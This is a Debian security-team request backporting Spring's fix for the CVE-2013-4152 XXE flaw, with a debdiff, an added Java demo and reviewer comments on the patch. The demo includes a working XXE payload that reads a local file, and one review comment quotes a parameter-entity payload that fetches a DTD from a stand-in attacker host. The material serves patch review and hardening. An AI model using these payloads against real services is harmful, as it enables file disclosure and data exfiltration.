
Debian RT: CVE-2013-4152 XML External Entity (XXE) injection in Spring Framework



Dear security team,

I have prepared a new version of libspring-java to fix CVE-2013-4152
(#720902) by backporting the related upstream patch [1]. I'm attaching
the debdiff against the version of libspring-java in stable. You can
also find an updated package at mentors.debian.net for an initial
review. [2]

Please let me know if the changes qualify for a stable-security release.
The affected libspring-oxm-java binary package has no further
reverse-dependencies. The problem type is local and remote. It is
possible to conduct DDoS attacks via XXE injections. Please refer to the
full disclosure (References) for additional information.

Description
===========

The Spring OXM wrapper did not expose any property for disabling entity
resolution when using the JAXB unmarshaller. There are four possible
source implementations passed to the unmarshaller:

    DOMSource
    StAXSource
    SAXSource
    StreamSource

For a DOMSource, the XML has already been parsed by user code and that
code is responsible for protecting against XXE.

For a StAXSource, the XMLStreamReader has already been created by user
code and that code is responsible for protecting against XXE.

For SAXSource and StreamSource instances, Spring processed external
entities by default thereby creating this vulnerability.

The issue was resolved by disabling external entity processing by
default and adding an option to enable it for those users that need to
use this feature when processing XML from a trusted source.

It was also identified that Spring MVC processed user provided XML with
JAXB in combination with a StAX XMLInputFactory without disabling
external entity resolution. External entity resolution has been disabled
in this case.

References
==========

http://seclists.org/bugtraq/2013/Aug/154
http://seclists.org/fulldisclosure/2013/Nov/14
http://www.gopivotal.com/security/cve-2013-4152

Regards,

Markus


[1] https://github.com/SpringSource/spring-framework/pull/317
[2] http://mentors.debian.net/debian/pool/main/libs/libspring-java/libspring-java_3.0.6.RELEASE-6+deb7u1.dsc
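The Description above lists the four Source types and says which side is responsible for each. The following is an added example, not part of this report or of Spring's own code, that exercises all four unmarshal paths against one constructed XXE payload using plain JAXB (javax.xml.bind, i.e. Java 8, or the jaxb-api/jaxb-runtime artifacts on later JDKs; the class, method names and the temp-file payload are mine): the bare StreamSource that the unpatched Jaxb2Marshaller forwarded untouched, a SAX reader hardened the way processSource() in the attached patch does it plus the parameter-entity and DTD features that patch does not set, and the StAX and DOM paths the advisory leaves to user code (the StAX settings are also what a Spring MVC XMLInputFactory needs).

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamReader;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.sax.SAXSource;
import javax.xml.transform.stream.StreamSource;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.XMLReaderFactory;

public class XxeDemo {

    @XmlRootElement(name = "note")
    public static class Note {
        public String body;
    }

    /** Constructed payload (assumption, not from the advisory): one general entity pointing at a local file. */
    static String payload(Path secret) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE note [ <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\"> ]>\n"
             + "<note><body>&xxe;</body></note>";
    }

    // (1) Vulnerable: a bare StreamSource. Before the patch Jaxb2Marshaller handed this
    //     straight to JAXB, whose default parser expands &xxe; to the file contents.
    static String viaStreamSource(JAXBContext ctx, String xml) throws Exception {
        Note n = (Note) ctx.createUnmarshaller().unmarshal(new StreamSource(new StringReader(xml)));
        return n.body;
    }

    // (2) SAX path, hardened. The first feature is the one the patch sets; the other three
    //     are the ones it leaves alone: parameter entities, external DTD fetching, and
    //     refusing any DOCTYPE at all when the application does not need DTDs.
    static String viaHardenedSax(JAXBContext ctx, String xml, boolean allowDoctype) throws Exception {
        XMLReader r = XMLReaderFactory.createXMLReader();
        r.setFeature("http://xml.org/sax/features/external-general-entities", false);
        r.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        r.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        r.setFeature("http://apache.org/xml/features/disallow-doctype-decl", !allowDoctype);
        SAXSource src = new SAXSource(r, new InputSource(new StringReader(xml)));
        Note n = (Note) ctx.createUnmarshaller().unmarshal(src);
        return n.body;
    }

    // (3) StAX path: Spring passes a StAXSource through untouched, so the caller must
    //     lock down the XMLInputFactory before creating the XMLStreamReader.
    static String viaHardenedStax(JAXBContext ctx, String xml) throws Exception {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        XMLStreamReader xsr = f.createXMLStreamReader(new StringReader(xml));
        Note n = (Note) ctx.createUnmarshaller().unmarshal(xsr);
        return n.body;
    }

    // (4) DOM path: likewise the caller's job; harden the builder before the Document
    //     (and therefore the DOMSource) exists.
    static String viaHardenedDom(JAXBContext ctx, String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        Document doc = dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
        Note n = (Note) ctx.createUnmarshaller().unmarshal(new DOMSource(doc));
        return n.body;
    }

    public static void main(String[] args) throws Exception {
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "SECRET-FILE-CONTENTS".getBytes(StandardCharsets.UTF_8));
        String xml = payload(secret);
        JAXBContext ctx = JAXBContext.newInstance(Note.class);

        report("StreamSource, default parser", () -> viaStreamSource(ctx, xml));
        report("SAXSource, entities off, DOCTYPE allowed", () -> viaHardenedSax(ctx, xml, true));
        report("SAXSource, DOCTYPE refused", () -> viaHardenedSax(ctx, xml, false));
        report("StAX, DTD support off", () -> viaHardenedStax(ctx, xml));
        report("DOM, DOCTYPE refused", () -> viaHardenedDom(ctx, xml));
        Files.deleteIfExists(secret);
    }

    interface Attempt { String run() throws Exception; }

    // Only the first line should ever show the file contents; every hardened path
    // yields an empty body (entity skipped) or a parse error (DOCTYPE/DTD refused).
    static void report(String label, Attempt a) {
        try {
            System.out.println(label + ": body=" + a.run());
        } catch (Exception e) {
            System.out.println(label + ": rejected (" + e.getClass().getSimpleName() + ")");
        }
    }
}
```

Path (2) with `allowDoctype = true` is the closest match to what the attached patch does for SAXSource and StreamSource, except that it also switches off parameter entities and external DTD loading; the patch sets only the general-entity feature, so a parameter-entity payload would still trigger an outbound fetch there.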
diff -Nru libspring-java-3.0.6.RELEASE/debian/changelog libspring-java-3.0.6.RELEASE/debian/changelog
--- libspring-java-3.0.6.RELEASE/debian/changelog	2012-06-21 03:29:11.000000000 +0200
+++ libspring-java-3.0.6.RELEASE/debian/changelog	2013-12-07 11:51:53.000000000 +0100
@@ -1,3 +1,17 @@
+libspring-java (3.0.6.RELEASE-6+deb7u1) wheezy-security; urgency=high
+
+  * Team upload.
+  * Fix CVE-2013-4152.
+    - New patch: Add-processExternalEntities-to-JAXB2Marshaller.patch.
+    - Now by default external XML entities are not processed when
+      unmarshalling. Processing of external entities will only be
+      enabled/disabled when the source passed to the unmarshaller is a
+      SAXSource or StreamSource. It has no effect for DOMSource or StAXSource
+      instances.
+    - (Closes: #720902)
+
+ -- Markus Koschany <apo@gambaru.de>  Sat, 07 Dec 2013 11:51:46 +0100
+
 libspring-java (3.0.6.RELEASE-6) unstable; urgency=low
 
   * Add optional B-D on openjdk-7-jdk.
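Review bot: the entry says external entities are now off by default but does not name the opt-in, so users who relied on entity expansion with a SAXSource or StreamSource have nothing to search for; add a line such as "Applications that need external entities from a trusted source must call setProcessExternalEntities(true)" to the second bullet, and consider saying "external general entities", since the patch body below sets a single SAX feature and parameter entities are unaffected.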
diff -Nru libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch
--- libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch	1970-01-01 01:00:00.000000000 +0100
+++ libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch	2013-12-07 11:38:15.000000000 +0100
@@ -0,0 +1,116 @@
+From: Markus Koschany <apo@gambaru.de>
+Date: Thu, 5 Dec 2013 10:59:47 +0100
+Subject: Add 'processExternalEntities to JAXB2Marshaller
+
+Added 'processExternalEntities' property to the JAXB2Marshaller, which
+indicates whether external XML entities are processed when
+unmarshalling.
+
+Default is false, meaning that external entities are not resolved.
+Processing of external entities will only be enabled/disabled when the
+Source} passed to #unmarshal(Source) is a SAXSource or StreamSource. It
+has no effect for DOMSource or StAXSource instances.
+
+Original patch by Arjen Poutsma.
+
+Bug: http://bugs.debian.org/720902
+---
+ .../springframework/oxm/jaxb/Jaxb2Marshaller.java  | 56 ++++++++++++++++++++++
+ 1 file changed, 56 insertions(+)
+
+diff --git a/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java b/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java
+index 890ce18..1b3412d 100644
+--- a/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java
++++ b/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java
+@@ -61,7 +61,9 @@ import javax.xml.stream.XMLStreamReader;
+ import javax.xml.stream.XMLStreamWriter;
+ import javax.xml.transform.Result;
+ import javax.xml.transform.Source;
++import javax.xml.transform.dom.DOMSource;
+ import javax.xml.transform.sax.SAXSource;
++import javax.xml.transform.stream.StreamSource;
+ import javax.xml.validation.Schema;
+ import javax.xml.validation.SchemaFactory;
+ 
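Review bot: only the DOMSource and StreamSource imports are added here, while processSource() later in the patch uses XMLReader, XMLReaderFactory, InputSource, SAXException and StaxUtils and the diff adds no imports for them; confirm the 3.0.6 class already imports all five (the unchanged `import javax.xml.transform.sax.SAXSource;` context line suggests the SAX types are present) or the backport will not compile.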
+@@ -158,6 +160,8 @@ public class Jaxb2Marshaller
+ 
+ 	private boolean lazyInit = false;
+ 
++	private boolean processExternalEntities = false;
++
+ 
+ 	/**
+ 	 * Set multiple JAXB context paths. The given array of context paths is converted to a
+@@ -301,6 +305,18 @@ public class Jaxb2Marshaller
+ 		this.lazyInit = lazyInit;
+ 	}
+ 
++	/**
++	 * Indicates whether external XML entities are processed when unmarshalling.
++	 * <p>Default is {@code false}, meaning that external entities are not resolved.
++	 * Note that processing of external entities will only be enabled/disabled when the
++	 * {@code Source} passed to {@link #unmarshal(Source)} is a {@link SAXSource} or
++	 * {@link StreamSource}. It has no effect for {@link DOMSource} or {@link StAXSource}
++	 * instances.
++	 */
++	public void setProcessExternalEntities(boolean processExternalEntities) {
++		this.processExternalEntities = processExternalEntities;
++	}
++
+ 	public void setBeanClassLoader(ClassLoader classLoader) {
+ 		this.beanClassLoader = classLoader;
+ 	}
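Review bot: the Javadoc promises that "external entities are not resolved", but the implementation further down sets only `external-general-entities`, so parameter entities and external DTD subsets are still fetched; either narrow the wording to "external general entities" or extend the implementation, and document that the catch block in processSource() falls back to the unprotected source. Two smaller points: `{@link StAXSource}` has no import in this patch's import hunk, so unless the file already imports `javax.xml.transform.stax.StAXSource` javadoc will flag an unresolved link (use the fully qualified name); and there is a setter but no `isProcessExternalEntities()` getter, so subclasses and bean introspection cannot read the effective value back.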
+@@ -569,6 +585,8 @@ public class Jaxb2Marshaller
+ 	}
+ 
+ 	public Object unmarshal(Source source, MimeContainer mimeContainer) throws XmlMappingException {
++		source = processSource(source);
++
+ 		try {
+ 			Unmarshaller unmarshaller = createUnmarshaller();
+ 			if (this.mtomEnabled && mimeContainer != null) {
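Review bot: processSource() is wired into the two-argument `unmarshal(Source, MimeContainer)` only; the one-argument `unmarshal(Source)` that the new Javadoc points at is not touched by the patch, so confirm that it delegates to this overload. If it calls createUnmarshaller() on its own, the most common entry point stays unprotected.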
+@@ -616,6 +634,44 @@ public class Jaxb2Marshaller
+ 		}
+ 	}
+ 
++	private Source processSource(Source source) {
++		if (StaxUtils.isStaxSource(source) || source instanceof DOMSource) {
++			return source;
++		}
++
++		XMLReader xmlReader = null;
++		InputSource inputSource = null;
++
++		if (source instanceof SAXSource) {
++			SAXSource saxSource = (SAXSource) source;
++			xmlReader = saxSource.getXMLReader();
++			inputSource = saxSource.getInputSource();
++		}
++		else if (source instanceof StreamSource) {
++			StreamSource streamSource = (StreamSource) source;
++			if (streamSource.getInputStream() != null) {
++				inputSource = new InputSource(streamSource.getInputStream());
++			}
++			else if (streamSource.getReader() != null) {
++				inputSource = new InputSource(streamSource.getReader());
++			}
++		}
++
++		try {
++			if (xmlReader == null) {
++				xmlReader = XMLReaderFactory.createXMLReader();
++			}
++			xmlReader.setFeature("http://xml.org/sax/features/external-general-entities";,
++					this.processExternalEntities);
++
++			return new SAXSource(xmlReader, inputSource);
++		}
++		catch (SAXException ex) {
++			logger.warn("Processing of external entities could not be disabled", ex);
++			return source;
++		}
++	}
++
+ 	/**
+ 	 * Template method that can be overridden by concrete JAXB marshallers for custom initialization behavior.
+ 	 * Gets called after creation of JAXB <code>Marshaller</code>, and after the respective properties have been set.
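Review bot: processSource() turns off only `http://xml.org/sax/features/external-general-entities`; `http://xml.org/sax/features/external-parameter-entities` and Xerces' `http://apache.org/xml/features/nonvalidating/load-external-dtd` stay enabled, so a payload of the form `<!ENTITY % p SYSTEM "http://attacker/x.dtd"> %p;` still makes the server fetch remote resources and can exfiltrate data through parameter entities; set both features from `this.processExternalEntities` as well, or `disallow-doctype-decl` to true when DTDs are not needed. Three further points in the same method: a StreamSource that carries only a systemId (no stream, no reader) leaves `inputSource` null and returns `new SAXSource(xmlReader, null)`, so add `else { inputSource = new InputSource(streamSource.getSystemId()); }`, and even when a stream is present the StreamSource's systemId is dropped, which changes how relative URIs in the document resolve; the `catch (SAXException ex)` branch logs a warning and returns the original, unprotected source, i.e. it fails open when the reader does not support the feature, and throwing would be the safer default; and the `;` after the feature-name string literal on the `setFeature` line looks like mail-archive URL mangling, so check that the patch in the actual upload reads `"http://xml.org/sax/features/external-general-entities",` before it is built.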
diff -Nru libspring-java-3.0.6.RELEASE/debian/patches/series libspring-java-3.0.6.RELEASE/debian/patches/series
--- libspring-java-3.0.6.RELEASE/debian/patches/series	2012-01-14 17:40:31.000000000 +0100
+++ libspring-java-3.0.6.RELEASE/debian/patches/series	2013-12-07 11:38:15.000000000 +0100
@@ -7,3 +7,4 @@
 0008_jpa_20_api.diff
 0009_hibernate_validator_41.diff
 0010_velocity_17.diff
+Add-processExternalEntities-to-JAXB2Marshaller.patch
